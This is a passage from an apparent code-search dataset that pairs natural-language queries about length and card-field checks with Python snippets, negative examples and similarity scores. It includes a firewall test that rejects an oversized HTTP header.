test_rfc_nickkey_length(s):\n assert len(util.rfc_nickkey(s)) == len(s)", "def check_length(length):\n if length > lengthLimit:\n err_str = \"The length value (%s) is higher than the \" % (length)\n err_str += \"limit length (%s)\" % (lengthLimit)\n raise ValueError(err_str)", "def check_bag_size(self):\r\n return len(self.db.tilestring)", "def remaining_cards(self):\n\n return str(len(self.hand))", "def test_deck_has_52_cards(self):\n self.assertEqual(len(cardutils.Deck().deck), 52)", "def test_len(self):\n self.assertEqual(len(self.tester), 27)", "def test_len(self):\n self.assertEqual(len(self.tester), 27)", "def __len__(self) -> int:\n return len(self.length)", "def test_has_correct_length(self) -> None:\n assert len(list(ccc.CompoundingConversationDataset())) == 131569", "def test_get_shortuuid_specific_length(self):\n id = get_shortuuid(length=10)\n self.assertTrue(len(id) == 10)", "def validVarConstructLength(self,varlen):\r\n if len(varlen)!=2:\r\n print 'variable must specify name and type'\r\n return False\r\n else:\r\n return True", "def _requiredLength(self):\n if self.partner is not None:\n if self.partner.level == self.level:\n return len(self.partner)\n elif self.partner.level < self.level:\n return 1\n elif self._value is not None:\n return 1\n else:\n return 0", "def __len__(self):\r\n return 4", "def _validate_length(self, value):\n return (self.maximum_length is None) or (len(value) <= self.maximum_length)", "def __len__(self):\n return len(self._canaux)", "def __len__(self):\n return self.length", "def __len__(self):\n return self.length", "def __len__(self):\n return self.length", "def __len__(self):\n return self.length", "def __len__(self):\n return self.length", "def __len__(self):\n return self.length", "def test_field_length_matches_data_type_field_length(self):\n for known_message_type in KNOWN_MESSAGE_TYPES:\n for field in known_message_type.fields:\n if self.is_verbose:\n print 'Checking length setup of field {0} in message {1}'.format(field.name, known_message_type.name)\n self.assertEqual(field.length, field.data_type.length)", "def test_uid_max_length(self):\n\n field = self.image._meta.get_field(\"uid\")\n self.assertEqual(field.max_length, 64)", "def test_candidatesubr_len(self):\n\n self.assertEqual(len(self.cand_subr), 3)", "def Length(self) -> int:", "def Length(self) -> int:", "def __len__():", "def __len__():", "def __len__():", "def __len__(self):\n return self._length # pylint: disable = E1101", "def __len__(self):\n\n return len(self.data) * 8", "def length(self):\n ...", "def _matchLength(self, length: int):\n return self._comparator['Length'] < length", "def len_unpadded(self) -> int:", "def __len__(self) -> int:\n return 3", "def reallength(value):\n try:\n value.count()\n except:\n return len(value)", "def __len__(self) -> int:\n return len(self.value)", "def __len__(self):\n\n return self.length", "def __len__(self) -> int:\n return self.length", "def num_cards(self):\n length=len(self.cards)\n return length", "def __len__(self):\n return self.cli.passwords.len()", "def __len__(self):\n\t\treturn 3", "def test_length(self):\n for length in range(2, 30):\n self.assertEqual(len(generate_password(length)), length)", "def length(self):\n pass", "def __len__(self):\n\t\treturn 8", "def __len__(self) -> int:\n return len(self.getvalue())", "def mobile_len_validator(mobile):\n if len(mobile) != 13:\n raise ValidationError('Invalid mobile len')", "def test_len(self):\n self.assertEqual(len(self.tester), 21)", "def test_field_len(self):\n client = self.base_scenario(\n frang_config=\"http_field_len 300;\",\n requests=[f\"POST /1234 HTTP/1.1\\r\\nHost: localhost\\r\\nX-Long: {'1' * 320}\\r\\n\\r\\n\"],\n )\n self.check_response(\n client,\n status_code=\"403\",\n warning_msg=\"frang: HTTP (in-progress )?field length exceeded for\",\n )", "def test_field_len(self):\n client = self.base_scenario(\n frang_config=\"http_field_len 300;\",\n requests=[self.post_request + [(\"header\", \"x\" * 320)]],\n )\n self.check_response(\n client,\n status_code=\"403\",\n warning_msg=\"frang: HTTP (in-progress )?field length exceeded for\",\n )", "def __len__(self):\n return 30", "def check_embed(embed: Embed) -> bool:\n if len(embed) <= 6000:\n if hasattr(embed, \"title\"):\n if len(embed.title) <= 256:\n pass\n else:\n return False\n if len(embed.fields) <= 25:\n for field in embed.fields:\n if len(field.name) <= 69420:\n pass", "def __len__(self):\n # TODO: Is this method used?\n return self._info['length']", "def length_of_name(self, name):\n length = len(name)\n if length > 10:\n self.show_message_when_name_very_long()\n return length", "def length(self) -> int:\n pass", "def __len__(self):\n return self._length", "def __len__(self):\n return self._length", "def __len__(self):\n return self._length", "def testLen(self):\n self.assertEquals(7, len(Color))", "def __len__(self):\n return 19", "def get_length(self):\r\n return len(self.hand)", "def source_data_key_length_check(source_data_key, algorithm):\n if len(source_data_key.data_key) != algorithm.kdf_input_len:\n raise InvalidDataKeyError(\n \"Invalid Source Data Key length {actual} for algorithm required: {required}\".format(\n actual=len(source_data_key.data_key), required=algorithm.kdf_input_len\n )\n )", "def test_len(self):\n self.assertEqual(len(self.tester), 30)", "def test_prep_charfield_size(self):\n pass", "def check_string_length(string):\n if len(string) > 255:\n sys.exit(\"ERROR: Max permitted string length is 255\")", "def __len__(self):\n return self.__length", "def test_has_correct_length(self) -> None:\n assert len(list(ccc.ConversationDataset())) == 7168", "def check_len(password_length, alphabet_length, numb_length, symb_length):\r\n return (symb_length + alphabet_length + numb_length) == password_length", "def format_length( self, key ) :\r\n\r\n return struct.calcsize( self[key] )", "def test_check_name_is_3_parts():\n check_name_length()", "def __len__(self) -> int:", "def __len__(self) -> int:", "def validate_length(column_name, value, length):\n valuelength = len(value)\n if valuelength > int(length) >= 0:\n return \"{0} : value '{1}' is greater than the specified length {2}\".format(column_name, value, length)\n elif valuelength < int(length) and int(length) >= 0:\n return \"{0} : value '{1}' is less than the specified length {2}\".format(column_name, value, length)\n\n return None", "def strlen(val): \n return len(val)", "def __length_hint__(self) -> 'Literal[28]':\n return 28", "def test_size():\n assert Packet106.size == 12" ]
[ "0.6684012", "0.64644367", "0.6452459", "0.6451033", "0.63982964", "0.6384937", "0.63768864", "0.63765895", "0.6351771", "0.6343237", "0.6343237", "0.6326682", "0.6316303", "0.62818766", "0.6273519", "0.6246097", "0.62296754", "0.62225854", "0.6151962", "0.61194175", "0.61119974", "0.6102316", "0.6030081", "0.6021634", "0.6005019", "0.59823304", "0.5954278", "0.5940963", "0.592178", "0.5916094", "0.5911423", "0.5911423", "0.5876943", "0.5842814", "0.5840498", "0.58372486", "0.5836066", "0.5832264", "0.5831336", "0.5823213", "0.5823174", "0.5823174", "0.5823174", "0.5823174", "0.5823174", "0.5823174", "0.5821509", "0.5804241", "0.57965857", "0.5793077", "0.5793077", "0.5790851", "0.5790851", "0.5790851", "0.5784896", "0.577884", "0.576828", "0.57630855", "0.57628006", "0.57524556", "0.5739808", "0.5736544", "0.5727635", "0.57273257", "0.5723598", "0.57222426", "0.5716714", "0.57166964", "0.57121617", "0.57121015", "0.5711378", "0.57078063", "0.5702311", "0.56941116", "0.56933767", "0.5688865", "0.568592", "0.5684701", "0.56758964", "0.56736773", "0.56720144", "0.56720144", "0.56720144", "0.56674296", "0.56662625", "0.5664701", "0.5658655", "0.5657769", "0.5647096", "0.5641308", "0.5639461", "0.56392515", "0.5638561", "0.563708", "0.56355596", "0.5633046", "0.5633046", "0.56329936", "0.5630994", "0.56293714", "0.56287557" ]
0.0
-1
Check length of CardHolder field (len = 29)
def test_31(self): assert 'True' == Api.requestBlock('test-31')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def max_length(verifield, required):\n if verifield is None: return True\n return len(verifield) <= required", "def check_len( string_key ) : \r\n\r\n if len( string_key ) != 4 :\r\n\r\n raise Eggog( \"'%s': EGI wants the key to be exactly four characters!\" % (string_key, ) ) \r\n \r\n else :\r\n \r\n return True", "def get_length(self):\n return len(self.cards)", "def len12(self, len): # -> None:\n ...", "def checkLength(ish, length):\n if ish == \"Visa\":\n ok = (13,16)\n elif ish == \"American Express\":\n ok = (15,)\n elif ish == \"MasterCard\":\n ok = (16,)\n elif ish == \"Discover/Novus\":\n ok = (16,)\n else:\n raise TypeError, \"unknown issuer\"\n return length in ok", "def checkPacketLength(self):\n return self.packetLength == len(self) - PRIMARY_HEADER_BYTE_SIZE - 1", "def __len__(self):\n return len(self.cards)", "def test_shared_cards_len(self):\n self.assertEqual(len(self.hand.sharedCards), 3)", "def __len__(self):\n return len(self._cards)", "def __len__(self):\n return len(self._cards)", "def verify_length(src_json):\n error: str = \"\"\n if len(src_json.get(\"LedGroups\", [])) == 0:\n error = \"No or empty LedGroups\"\n if len(src_json.get(\"Sequencers\", [])) == 0:\n error = \"No or empty Sequencers\"\n return error", "def LengthTest(arr):\n\tif len(arr) == 8:\n\t\treturn True;\n\telif len(arr) == 7:\n\t\treturn IsMissingField('cid', arr)\n\telse:\n\t\treturn False", "def test_partial_deck_has_fewer_cards(self):\n self.assertEqual(len(self.partialDeck.deck), 46)", "def verify_length(src_json: Dict[str, List[str]]):\n if len(src_json.get(\"Leds\", [])) == 0:\n return \"No Leds in Group\"", "def __len__(self):\n return len(self._cards)", "def get_length(self):\r\n return len(self.deck)", "def min_length(verifield, required):\n if verifield is None: return True\n return len(verifield) >= required", "def __len__( self ):\n \n return len(self.__deck)", "def test_length(self):\n form_data = self.form_data('c897B$eH@')\n form = self.form(data=form_data, user=self.u)\n self.assertFalse(form.is_valid())", "def test_maxlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'license_plate': 'AF8934'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': '123456'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF893'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF8-934'}\n self.assertFalse(val.validate(document))\n\n document = {'license_plate': 'AF 934'}\n self.assertFalse(val.validate(document))", "def test_lengths(self):\n self.assertEqual(size(attempt.Z), 201)\n self.assertEqual(size(attempt.W), 201)", "def len23(self, len): # -> None:\n ...", "def __len__(self):\n return len(self.raw)", "def _check_field_length(self, field, value, options=None):\n options = options if options else field.GetOptions()\n for (option, setting) in options.ListFields():\n if option.name == \"length\":\n if self.__gt_by_type(value, setting):\n if hasattr(field, \"name\"):\n raise FieldTooLongException(\"The field '\" + field.name +\n \"' is bigger than the allowed \" + str(setting) + \" bytes\")\n else:\n raise FieldTooLongException(\"List element '\" + str(value) +\n \"' is bigger than the allowed \" + str(setting) + \" bytes\")", "def length(value):\n\n # Try to return the length\n return len(value)", "def remaining_cards(self):\n\n return str(len(self.hand))", "def check_bag_size(self):\r\n return len(self.db.tilestring)", "def check_length(length):\n if length > lengthLimit:\n err_str = \"The length value (%s) is higher than the \" % (length)\n err_str += \"limit length (%s)\" % (lengthLimit)\n raise ValueError(err_str)", "def test_rfc_nickkey_length(s):\n assert len(util.rfc_nickkey(s)) == len(s)", "def test_len(self):\n self.assertEqual(len(self.tester), 27)", "def test_len(self):\n self.assertEqual(len(self.tester), 27)", "def test_deck_has_52_cards(self):\n self.assertEqual(len(cardutils.Deck().deck), 52)", "def __len__(self):\r\n return 4", "def test_get_shortuuid_specific_length(self):\n id = get_shortuuid(length=10)\n self.assertTrue(len(id) == 10)", "def test_has_correct_length(self) -> None:\n assert len(list(ccc.CompoundingConversationDataset())) == 131569", "def __len__(self) -> int:\n return len(self.length)", "def test_field_length_matches_data_type_field_length(self):\n for known_message_type in KNOWN_MESSAGE_TYPES:\n for field in known_message_type.fields:\n if self.is_verbose:\n print 'Checking length setup of field {0} in message {1}'.format(field.name, known_message_type.name)\n self.assertEqual(field.length, field.data_type.length)", "def test_uid_max_length(self):\n\n field = self.image._meta.get_field(\"uid\")\n self.assertEqual(field.max_length, 64)", "def length(self):\n ...", "def __len__(self):\n return self.length", "def __len__(self):\n return self.length", "def __len__(self):\n return self.length", "def __len__(self):\n return self.length", "def __len__(self):\n return self.length", "def __len__(self):\n return self.length", "def __len__(self):\n\n return len(self.data) * 8", "def Length(self) -> int:", "def Length(self) -> int:", "def __len__(self):\n return 19", "def format_length( self, key ) :\r\n\r\n return struct.calcsize( self[key] )", "def __len__(self):\n return 30", "def test_field_len(self):\n client = self.base_scenario(\n frang_config=\"http_field_len 300;\",\n requests=[f\"POST /1234 HTTP/1.1\\r\\nHost: localhost\\r\\nX-Long: {'1' * 320}\\r\\n\\r\\n\"],\n )\n self.check_response(\n client,\n status_code=\"403\",\n warning_msg=\"frang: HTTP (in-progress )?field length exceeded for\",\n )", "def __len__(self):\n return self._length # pylint: disable = E1101", "def __len__(self):\n\t\treturn 8", "def _validate_length(self, value):\n return (self.maximum_length is None) or (len(value) <= self.maximum_length)", "def length_of_name(self, name):\n length = len(name)\n if length > 10:\n self.show_message_when_name_very_long()\n return length", "def test_field_len(self):\n client = self.base_scenario(\n frang_config=\"http_field_len 300;\",\n requests=[self.post_request + [(\"header\", \"x\" * 320)]],\n )\n self.check_response(\n client,\n status_code=\"403\",\n warning_msg=\"frang: HTTP (in-progress )?field length exceeded for\",\n )", "def _matchLength(self, length: int):\n return self._comparator['Length'] < length", "def check_embed(embed: Embed) -> bool:\n if len(embed) <= 6000:\n if hasattr(embed, \"title\"):\n if len(embed.title) <= 256:\n pass\n else:\n return False\n if len(embed.fields) <= 25:\n for field in embed.fields:\n if len(field.name) <= 69420:\n pass", "def validVarConstructLength(self,varlen):\r\n if len(varlen)!=2:\r\n print 'variable must specify name and type'\r\n return False\r\n else:\r\n return True", "def __len__(self) -> int:\n return len(self.getvalue())", "def __len__():", "def __len__():", "def __len__():", "def __len__(self) -> int:\n return 3", "def __len__(self):\n return len(self._canaux)", "def __length_hint__(self) -> 'Literal[28]':\n return 28", "def test_prep_charfield_size(self):\n pass", "def __len__(self):\n\n return self.length", "def _requiredLength(self):\n if self.partner is not None:\n if self.partner.level == self.level:\n return len(self.partner)\n elif self.partner.level < self.level:\n return 1\n elif self._value is not None:\n return 1\n else:\n return 0", "def length(self):\n pass", "def len_unpadded(self) -> int:", "def __len__(self):\n # TODO: Is this method used?\n return self._info['length']", "def __len__(self) -> int:\n return self.length", "def __len__(self):\n\t\treturn 3", "def mobile_len_validator(mobile):\n if len(mobile) != 13:\n raise ValidationError('Invalid mobile len')", "def num_cards(self):\n length=len(self.cards)\n return length", "def test_candidatesubr_len(self):\n\n self.assertEqual(len(self.cand_subr), 3)", "def __len__(self) -> int:\n return len(self.value)", "def reallength(value):\n try:\n value.count()\n except:\n return len(value)", "def test_size():\n assert Packet106.size == 12", "def __len__(self):\n return len(self.content)", "def __len__(self):\n return len(self.content)", "def __len__(self):\n return len(self.content)", "def get_length(self):\r\n return len(self.hand)", "def validate_length(column_name, value, length):\n valuelength = len(value)\n if valuelength > int(length) >= 0:\n return \"{0} : value '{1}' is greater than the specified length {2}\".format(column_name, value, length)\n elif valuelength < int(length) and int(length) >= 0:\n return \"{0} : value '{1}' is less than the specified length {2}\".format(column_name, value, length)\n\n return None", "def test_len(self):\n self.assertEqual(len(self.tester), 21)", "def length(self) -> int:\n pass", "def __len__(self):\n return self._length", "def __len__(self):\n return self._length", "def __len__(self):\n return self._length", "def __len__(self) -> int:\n return len(self.contents)", "def test_has_correct_length(self) -> None:\n assert len(list(ccc.ConversationDataset())) == 7168", "def __len__(self):\n return len(self.bytes)", "def test_client_ip_max_length(self):\n request = Request.objects.get(id=1)\n max_length = request._meta.get_field('client_ip').max_length\n self.assertEquals(max_length, 100)", "def invalid_caterpillar_length(length):\n try:\n length = int(length)\n except ValueError:\n return \"`caterpillar-length` must be something that can be cast to an `int`\"\n\n if not 1 <= length <= len(app.desk.indeces):\n return (\n \"`caterpillar-length` must be a number between \"\n f\"1 and {len(app.desk.indeces)}\"\n )\n\n return False", "def test_len(self):\n self.assertEqual(len(self.tester), 30)", "def getLength(self):\n return None", "def getLength(self):\n return None", "def test_length(self):\n for length in range(2, 30):\n self.assertEqual(len(generate_password(length)), length)", "def test_minlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'postal_code': '9050'}\n self.assertTrue(val.validate(document))\n\n document = {'postal_code': 'B-9050'}\n self.assertTrue(val.validate(document))\n\n document = {'postal_code': '905'}\n self.assertFalse(val.validate(document))" ]
[ "0.6592967", "0.6412684", "0.6403937", "0.64020187", "0.63984334", "0.6374663", "0.6358877", "0.6322181", "0.63155454", "0.63155454", "0.6293918", "0.62928987", "0.62740266", "0.6272036", "0.62385446", "0.6238426", "0.62309074", "0.6216641", "0.6173284", "0.6161911", "0.61607", "0.6151011", "0.6106857", "0.6018831", "0.5974027", "0.5961096", "0.59535277", "0.5922838", "0.5912662", "0.59034395", "0.59034395", "0.58716047", "0.5851824", "0.5841469", "0.5841197", "0.583395", "0.58220214", "0.5816099", "0.5812824", "0.58081996", "0.58081996", "0.58081996", "0.58081996", "0.58081996", "0.58081996", "0.5806492", "0.5787479", "0.5787479", "0.5779192", "0.5769492", "0.5765509", "0.57589036", "0.5758036", "0.57570946", "0.5750065", "0.5748494", "0.5744359", "0.57358986", "0.57339793", "0.5732642", "0.5732322", "0.5726195", "0.5726195", "0.5726195", "0.57239413", "0.5722867", "0.5719954", "0.57142913", "0.5710491", "0.57088923", "0.5707635", "0.57071805", "0.57066333", "0.5706312", "0.5701961", "0.5699623", "0.5697999", "0.56931686", "0.5685391", "0.5683254", "0.56741977", "0.5670851", "0.5670851", "0.5670851", "0.5667268", "0.5657991", "0.5645105", "0.56430984", "0.5642547", "0.5642547", "0.5642547", "0.5637633", "0.56366205", "0.5625004", "0.5620609", "0.5615839", "0.5613935", "0.56129503", "0.56129503", "0.56107974", "0.5609621" ]
0.0
-1
Send only spaces in CardHolder
def test_32(self): assert 'False' == Api.requestBlock('test-32')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "async def spaced(self, ctx: DogbotContext, *, text: clean_content):\n await ctx.send(text.replace('', ' ').strip())", "def test_send_strips(connection, writer, loop):\n loop.run_until_complete(connection.connect())\n connection.send(\" a b c | @#$ d \")\n assert writer.used\n assert writer.has_written(\"a b c | @#$ d\\n\")", "def _hackBotchedCard(self, card, res):\n\t\tmat = re.match(r\"([^\\s=]*)\\s*=\\s*([^/]+)\", card.cardimage)\n\t\tif mat:\n\t\t\tres[mat.group(1)] = mat.group(2).strip()\n\t\telse: # Card beyond recognition, ignore\n\t\t\tpass", "def mecard(name, tel, email):\n return f'MECARD:N:{name};TEL:{tel};EMAIL:{email};'", "def sendingString(self):\n return ''", "def display_content(com,message):\n #message = message.encode('utf-8')\n #message = message.decode('ascii', 'ignore')\n safeMsg = filter(lambda x: x in string.printable, message)\n safeMsg = safeMsg.replace('\\n', ' ')\n print \"ALPHA: \", safeMsg\n try:\n #com = serial.Serial(config.devalpha, 9600, timeout=3)\n #com.close()\n #com.open()\n comstr = config.alpha['display'] + safeMsg + config.alpha['eot']\n com.write(comstr)\n #com.close()\n except serial.SerialException as e:\n logging.warning(\"Serial exception: \"+str(e))", "def get_space_bytes(self, bytes_):\n if self.state == 'S':\n # in space eating mode\n # control space needed?\n if bytes_.startswith(u' '):\n # replace by control space\n return u'\\\\ ', bytes_[1:]\n else:\n # insert space (it is eaten, but needed for separation)\n return u' ', bytes_\n else:\n return u'', bytes_", "def card(phenny, input):\n if not input.group(2):\n phenny.say(input.nick + 'Perhaps you meant \".card Storm Crow\"?')\n else:\n card_name = input.group(2).strip().lower().title()\n if card_name in nick.nicknames:\n card_name = nick.nicknames[card_name]\n card_text = get_card(card_name)\n if card_text:\n phenny.reply(card_text)\n else:\n phenny.reply(\"I could not find a card by that name.\")", "async def deliver_card(list_of_lists: List[List[str]]) -> str:\n\n final_string = []\n for sublist in list_of_lists:\n final_string.append('\\u200A'.join(sublist))\n\n # add blank emoji to first line to accommodate compact mode w/o resizing emojis\n return '<:blank:589560784485613570>\\n' + '\\n'.join(final_string)", "def propeller_card(card):\n return card.as_html()", "def white_spaces(value):\n if re.search(r'[\\s]', value):\n raise ValidationError(_('El login no puede contener espacios en blanco'))", "def fillBlanks(w_cards, b_card):\n b_card = b_card.replace('_', w_cards.replace('.', ''), 1)\n\n return b_card", "async def fivedollar(self, ctx):\n await ctx.message.edit(content=\"[̲̅$̲̅(̲̅5̲̅)̲̅$̲̅]\")", "def test_it_trims_whitespace(self):\n\n url = \"/integrations/add/\"\n form = {\"kind\": \"email\", \"value\": \" alice@example.org \"}\n\n self.client.login(username=\"alice@example.org\", password=\"password\")\n self.client.post(url, form)\n\n q = Channel.objects.filter(value=\"alice@example.org\")\n self.assertEqual(q.count(), 1)", "def get21_str(in_dict):\n return \"\"\"BEGIN:VCARD\nVERSION:2.1\nN;ENCODING=QUOTED-PRINTABLE;CHARSET=UTF-8:;%s;;;\nTEL;VOICE;CELL:%s\nEND:VCARD\n\"\"\"%(quopri.encodestring(in_dict[\"name\"]), in_dict[\"tel\"])", "def nettoie(txt):\n\ttxt = re.sub(\"\\s*$\",\"\",txt)\n\ttxt = re.sub(\"^\\s*\",\"\",txt)\n\treturn txt", "def squeeze(value):\r\n return re.sub(r\"[\\x00-\\x20]+\", \" \", value).strip()", "def preprocess_msg(self):\n self.tmp_msg = self.tmp_msg.lower()\n cleared = ''\n for ch in self.tmp_msg:\n if ch in string.ascii_lowercase:\n cleared += ch\n\n c = ''\n for ch in cleared:\n c += '{:02d}'.format(ord(ch) - 97)\n if len(c) % 4 != 0:\n c += '99'\n self.tmp_msg = c\n\n super().preprocess_msg()", "def card_factory(value: str, base: str, is_hidden: bool = False) -> str:\n if 1 <= len(value) <= 2:\n card = list(base)\n card[13:15] = f\"{value} \" if len(value) == 1 else f\"{value}\"\n card[74:76] = f\" {value}\" if len(value) == 1 else f\"{value}\"\n else:\n raise Exception(\"Invalid value lenght. Must be 1 or 2 charaters\")\n\n return hidden_face if is_hidden else \"\".join(card)", "def testCardStr(self):\n cardObj = Card('A','d')\n self.assertEquals('Ad',str(cardObj))", "def as_string(self):\n # Remove cards which have no definition\n cards = [card for card in self if card.definition is not None]\n # Remove cards which have no word\n cards = [card for card in cards if card.word]\n return \"\\n\".join([card.get_flashcard() for card in cards])", "def strip_space():\n pass", "def deal_card(self, player: BaseBlackjackPlayer, is_open: bool = True) -> str:\n card = self.deck.pick_card(discard=True, is_open=is_open)\n player.hand.cards.append(card)\n return f\"\\n{player.username} received {card}. Total is: {player.hand.value}\"", "def test_alnum(self, address):\n t=address.replace(\" \", \"\").isalnum()\n assert t, \"it only accept digits and letters\"", "def __card_display(self):\n return ''.join([(each_number if (i == 0 or i % 4 != 0) else ' ' + each_number)\n for i, each_number in enumerate(self.card_number)])", "def card_html_id(card):\n return f'c{card:02d}'", "def translate_deckbox_card_name(card_name: str) -> str:\n card_name = re.sub(r' \\(.*', '', card_name)\n card_name = re.sub(r'Æ', 'Ae', card_name)\n card_name = re.sub(r'Lim-Dûl\\'s Vault', 'Lim-Dul\\'s Vault', card_name)\n return card_name", "def message(self, text):\n\n if( rpi_device ):\n self.clear()\n for char in text:\n if char == '\\n' or char == '^':\n self.cmd(0xC0) # new line\n else:\n self.cmd(ord(char),True)", "def test_space_characters(client):\n response=client.post(\"/signin\",data=dict(email=' ', password=' '), content_type=\"multipart/form-data\")\n data=json.loads(response.data)\n assert response.status_code==401\n assert data[\"error\"] == \"email and password values can not be space characters\"", "def filter_chars(accepted_chars,target):\n while True:\n c = (yield)\n if c.lower() in accepted_chars:\n target.send(c.lower())", "def character(self):\n if self.is_alive():\n return \"[*]\"\n return \"[ ]\"", "def __str__(self):\n return self.card_no", "def manage_text(msg):\r\n msg = msg.upper()\r\n msg_final = \"\"\r\n for i in msg:\r\n if i.isalpha():\r\n msg_final += i\r\n return msg_final", "def _preprocess(self, sent: str) -> str:\n sent = sent.replace(\" \", \"▁\")\n return \" \".join([c for c in sent])", "def sn(self):\n\t\tstring = []\n\t\tresp = [0x00]\n\t\tself.spi.transfer([0x10], [0x00], 1)\n\t\ttime.sleep(9e-3)\n\t\tfor i in range(60):\n\t\t\tself.spi.transfer([0x00], resp, 1)\n\t\t\tstring.append(chr(resp[0]))\n\t\ttime.sleep(0.1)\n\t\treturn ''.join(string).strip()", "def do_cardid(self, line):\n if self.bootstrap() != 0:\n return self.return_code(1, True)\n\n key = self.card.get_pubkey()\n key_fmted = self.format_pubkey(key)\n\n print('\\nCard ID: %s' % key_fmted)\n return self.return_code(0)", "def test_is_str_rep_string(self):\n self.assertIsInstance(cardutils.Card(10,1).__str__(), str)", "def make_card_wish(self, symbol, player):\n if player == self.current_player:\n if symbol in \"s c h d\":\n self.wait_for_card_wish = False\n self.card_wished = symbol\n self.choose_next_player()\n return True\n return False", "def safe_number(self):\n mask = '*' * (len(self.card_number) - 4)\n return '{0}{1}'.format(mask, self.card_number[-4:])", "def gateway(arg):\n\tassert isinstance(arg, str)\n\treturn r\"(?P<%s>[\\w_\\-@\\' \\.]+)\" % (arg,)", "def __send(self) -> None:\n # region Docstring\n # endregion\n\n if len(self.entryline.get_text().strip()) > 0:\n self.udp.transmission(\n \"CHA\", \"01\", self.username, self.entryline.get_text().strip()\n )\n self.__addmsg(f\"<b>(YOU): </b><br>{self.entryline.get_text().strip()}<br>\")\n self.entryline.set_text(\"\")", "def produce_message_for_sending() -> str:\n return f\"You can donate your money here:\\n`{card_donations}`\"", "def clean_phone(self):\n data = self.cleaned_data['phone']\n data = data.strip(' +').replace('-', '')\n if len(data) == 12:\n data = data[3:]\n\n return data", "def remove_spaces(self, secret: str) -> str:\n\n secret_without_spaces = secret.replace(\" \", \"\")\n secret_without_spaces = re.sub(r\"\\W\", \"\", secret_without_spaces)\n return secret_without_spaces", "def _sendAndTrim(self, command, delim=None):\n assertTimeout = int (globalVar.assertTimeout)\n p = self.spawnProc\n p.sendline(command)\n a=p.readline()\n #print a\n\tif (not delim):\n\t prompt = self.prompt\n\telse:\n\t prompt = delim\n\n expList.append(prompt) \n \n result = p.expect(expList,assertTimeout)\n\n if (result != 2) :\n self._postCheck(result)\n # at this point, we have the output but also the command and\n # part of the prompt. get rid of the prompt chunk.\n if (not delim):\n\t promptChunk = self.promptChunk\n\telse:\n\t promptChunk = delim\n\n output = re.sub(promptChunk, '', p.before)\n output = re.sub(command+'\\r\\n', '', output)\n return output", "def space_between(self):\n self.spawn(\"./initials\").stdin(\"hailey James\", prompt=False).stdout(match(\"HJ\"), \"HJ\\n\").exit(0)", "def sendTcSpace(self, tcPacket):\n LOG_INFO(\"EDEN.Client.sendTcSpace\", \"EDEN\")\n tcSpacePDU = EGSE.EDENPDU.TCspace()\n tcSpacePDU.setCCSDSpacket(tcPacket)\n self.sendPDU(tcSpacePDU)", "def send_to_outputfield(self, message):\n\n try:\n # First strip characters outside of range\n # that cannot be handled by tkinter output field\n char_list = ''\n for x in range(len(message)):\n if ord(message[x]) in range(65536):\n char_list += message[x]\n message = char_list\n except Exception as e:\n logging.error(str(e))\n logging.exception(\"Exception : \")\n try:\n self.output.insert(END, message + \"\\n\")\n except Exception as e:\n logging.error(str(e))\n logging.exception(\"Exception : \")", "def test_sanitized_trim(self):\n value = \" sample \"\n response = clean.trim(value)\n assert response == \"sample\"\n assert type(response) == str", "def _spacer(self, msg):\n msg = str(msg)\n msg_len = len(msg)\n if msg_len == 1:\n print(\" \", end=\"\")\n elif msg_len == 2:\n print(\" \", end=\"\")", "def c_message(text):\n string = text\n string = string.replace('_', ' ')\n return \"C {}\".format(string)", "def preprocess_text(self):\n self.text_received = self.text_received.replace(\" \", \"\").lower()", "def absenden(self):\n\n message = self.textFeld.toPlainText()\n self.c.send(message)\n self.textFeld.clear()", "def send_msgs(self, submit_success):\n data = {}\n if submit_success:\n data['title'] = '[%s 同学] 打卡成功!' % (self.info.get('name', self.username))\n data['content'] = '🦄 已为您打卡成功!</br>最终打卡状态: %s</br>打卡时间 %s' \\\n % (self.status, datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"))\n else:\n data['title'] = '[%s 同学] 打卡失败!' % (self.info.get('name', self.username))\n data['content'] = '❌ 打卡失败!请手动打卡~</br>最终打卡状态: %s</br>打卡时间 %s' \\\n % (self.status, datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"))\n for msg_sender in self.msg_senders:\n try:\n status = msg_sender.send(data)\n if status:\n logger.info(\"%s %s send a hit card message to you, hit card status: %s\"\n % (self, msg_sender, self.status))\n else:\n logger.warning(\"%s %s failed to send a hit card message to you, hit card status: %s\"\n % (self, msg_sender, self.status))\n except Exception as e:\n logger.warning(\"%s %s failed to send a hit card message to you, hit card status: %s, Error msg: %s\"\n % (self, msg_sender, self.status, e))\n traceback.print_exc()", "def secret_char(c):\n return \"\\\\raisebox{{0.07ex}}{{{}}}\".format(c)", "def validCard(card):\n card = card.strip()\n #print(\"Card: \"+card)\n #print(\"Card in hex: \" + \":\".join(\"{:02x}\".format(ord(c)) for c in card))\n \n if re.fullmatch(\"[0-9]{10}\", card):\n return hashlib.sha1(card.encode(\"ascii\")).hexdigest()\n else:\n return None", "def filter_blanks(user, str):\n return re.sub(r'\\n{2}\\n+', '\\n', str)", "def ui_input() -> str:\n return input('Enter cards numbers(spaces needed): ')", "def cardholder_name(self):\n return self.__cardholder_name", "def __str__(self):\n card_str = ['-' * CARD_WIDTH]\n card_str.append('{} (Game {})'.format(self.name, self.game.number).center(CARD_WIDTH))\n card_str.append('-' * CARD_WIDTH)\n card_str.append(''.center(CARD_WIDTH))\n card_str.append('Money: {}'.format(self.money).center(CARD_WIDTH))\n card_str.append('Turnover: {}'.format(self.turnover).center(CARD_WIDTH))\n card_str.append(''.center(CARD_WIDTH))\n card_str.append('-' * CARD_WIDTH)\n return '\\n'.join('|{}|'.format(l) for l in card_str)", "def Send_newCards(self, cards): \n serialized = [c.serialize() for c in cards]\n self.Send({\"action\": \"newCards\", \"cards\": serialized})", "def get_card_str(self, card):\n card_str = str(card)\n if card == 11:\n card_str = \"Jack\"\n if card == 12:\n card_str = \"Queen\"\n if card == 13:\n card_str = \"King\"\n if card == 1:\n card_str = \"Ace\"\n \n return card_str", "def safety_command(update,context):\n update.message.reply_text('Quick 